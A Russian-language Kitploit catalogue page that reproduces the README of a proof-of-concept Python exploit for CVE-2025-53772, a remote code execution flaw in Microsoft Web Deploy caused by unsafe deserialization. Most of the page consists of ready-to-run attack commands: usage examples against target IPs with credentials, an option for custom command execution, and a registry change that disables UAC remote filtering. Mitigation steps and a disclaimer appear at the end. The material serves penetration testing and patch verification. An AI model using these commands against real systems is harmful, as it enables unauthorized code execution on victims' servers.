Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-53772 — PoC для CVE-2025-53772 | Kitploit
Инструменты/GitHubGitHub/sailay1996/cve-2025-53772
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

PoC для CVE-2025-53772

Репозиторий
46118 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-53772 - Эксплойт удаленного выполнения кода Microsoft Web Deploy

Python-эксплойт для CVE-2025-53772 — уязвимости удаленного выполнения кода в Microsoft Web Deploy (msdeploy), вызванной небезопасной десериализацией данных HTTP-заголовка.

🎬 Видео POC

POC


Обзор уязвимости

PropertyValue
CVE IDCVE-2025-53772
CVSS Score8.8 (High)
Affected ProductMicrosoft Web Deploy 4.0
Vulnerable Versions< 10.0.2001
Patched Version10.0.2001+
Vulnerability TypeDeserialization of Untrusted Data (CWE-502)
AuthenticationRequired (Low Privilege)

Как это работает

Уязвимость существует в десериализации HTTP-заголовка MSDeploy.SyncOptions. При отправке специально сформированной полезной нагрузки сервер десериализует её с помощью BinaryFormatter, что приводит к выполнению произвольного кода через цепочку гаджетов TypeConfuseDelegate.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Затронутые конечные точки

EndpointPortProtocolAuth Type
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

Установка

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Требования

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Использование

Быстрый старт

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Параметры

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

Примеры

Agent Service (порт 80 — NTLM-аутентификация)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc Service (порт 8172 — базовая аутентификация)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Проверка

После запуска эксплойта проверьте выполнение на целевом устройстве:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Частые проблемы

401 Unauthorized (NTLM)

Если вы используете Agent Service с NTLM и получаете 401:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Not Found (msdeploy.axd)

Возможно, обработчик IIS не зарегистрирован. Используйте конечную точку Agent Service:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Проверка уязвимой версии

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Меры по устранению

  1. Обновите Web Deploy до версии 10.0.2001 или новее
  2. Ограничьте доступ к конечным точкам Web Deploy через брандмауэр
  3. Используйте надежные учетные данные и избегайте повторного использования паролей
  4. Отслеживайте журналы на предмет подозрительной активности на портах 80/8172
  5. Отключите Web Deploy, если он не нужен

Ссылки

  • Бюллетень безопасности Microsoft
  • NVD — CVE-2025-53772
  • Оригинальное исследование HawkTrace

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте соответствующие разрешения перед тестированием.


Лицензия

MIT License

Скачать инструмент